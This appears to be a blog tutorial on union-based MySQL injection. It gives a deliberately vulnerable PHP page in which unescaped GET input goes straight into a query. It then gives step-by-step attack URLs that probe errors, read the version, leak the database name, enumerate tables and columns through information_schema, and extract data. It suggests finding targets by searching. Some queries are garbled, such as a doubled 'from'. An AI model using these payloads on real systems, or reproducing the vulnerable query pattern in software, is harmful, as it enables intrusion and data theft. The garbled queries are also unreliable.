For free time that I don’t have

Today my words are linked to my previous publications around MySQL injection attack , I examine the structure of URL used to attack .  as known each database has exclusive language ( query ) and the developing coding language handling dynamic queries makes no difference … here we go :

0. Starting :

What is the first thing you need to attack ? knowledge ? imagination ? tools ? … no you need target , provide a target simply by searching or create a local database and connect below script to MySQL :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

<?php
    require_once('db.inc.php');
    $id = isset($_GET['id']) ? $_GET['id'] : 0;
    //$id = mysql_real_escape_string($userid);
    $result = mysql_query("SELECT user,id FROM table WHERE id=$id");
	$bHeader = false;
	if ($result){ 
	while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {
                if (!$bHeader) {
                    $bHeader = true;
                    echo '<table border=1><tr>';
                    foreach ($row as $k=>$v)
                        echo "<th>$k</th>";
                    echo '</tr>';
                }
                echo '<tr>';
                foreach ($row as $v)
                    echo "<tD>$v</td>";
                echo '</tr>';
            }
            if ($bHeader) echo '</table>';
			}else{
			//print(mysql_error());
			}	
?>

It never shows the MySQL errors returned , uncomment the line 23 and the errors will be shown clearly !

1. Gathering information :

Always start by collecting information , in the most cases and portals the PHP pages connects to MySQL database  , however that is not always true and won’t be . The attainment of type of database , by errors returning from application !

• Attention  : in all of this article the target supposed to be unsafe and vulnerable and all injection is explained in the GET method .

So , the ” single quote ” is commonly used :

/page.php?id=1'

• Probably returned :

You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near '\" at
line 1  And you see the database is MySQL .

2. Number of columns :

Find out the columns statement by ” union select ” or ” order by ” , since I told it before , I ignore it quickly so refer HERE . in this article from here to end the target is imagined to be had two columns !

3. Version of MySQL :

The version of MySQL is important because the information schema has been released after MySQL 5 and in older version hacker didn’t have option of choice to obviously determine tables and columns , so their names must have unfairly been guessed … The following URL grants the version of database installed , the syntax shown :

/page.php?id=-1 union select 1,version()

And if the 5.xx is not appeared you would continue by testing optional names , otherwise be prepared to go next step .

4. Name of database :

In this phase the database name of target either must specifically be known or you will have all tables of the entire of databases ! I mean if you somebody doesn’t specific the database name in query being injected , all of tables will be listed on page … let me get back to my words , the non existence of table name should be given and you need to make a fake error cleverly :

/page.php?id=-1 union select 1,2 from blahblah

• And server responds :

Table 'Sc0rpion.blahblah' doesn't exist

The - Sc0rpion -  is the database name rushed on !

5. Names of tables :

I’m going show you how the tables are listed , the golden query :

/page.php?id=-1 union select table_name,2 from from information_schema.tables
where TABLE_SCHEMA='Sc0rpion'

It shows all tables without any limitation . ( As you see the database name has to be between single quote , the discussion made here that if either the - magic_quote - from php.ini is on or the query is secured and placed in mysql_real_escape_string() function , the prevention will be made around the single quote … so wait for the bonus stuff to bypass this section of minor security ! )

6. Names of columns :

We will follow the previous structure , the query :

/page.php?id=-1 union all select column_name,2 from information_schema.columns
where TABLE_SCHEMA='Sc0rpion' and TABLE_NAME='table_name'

The user arrives columns related to - table_name - , put a distinct table name per try !

7. Extracting the information :

By knowing the tables and columns the injection will be easy in pages having security holes , at last grab the information :

/page.php?id=-1 union all select column_name,2 from table_name

• What is the solution ?

I’ve told checking validation of string format HERE but here we had integer values that is meaning escaping by mysql_real_escape_string() is functionally wrong and causes the script still would be insecure . so wait for the next post of MySQL injection .

Finally take a look at Mormoroth’s tutorial clip , for better concept : Loading , be safe !

Bypassing, Mysql injection, PHP, Security bypass magic_quote, bypass mysql_real_escape_string, escaping by mysql_real_escape_string(), information schema, information schema mysql, local database, magic_quote, Mysql injection, order by, TABLE_SCHEMA, union select, union select table_name, unsafe dynamic mysql query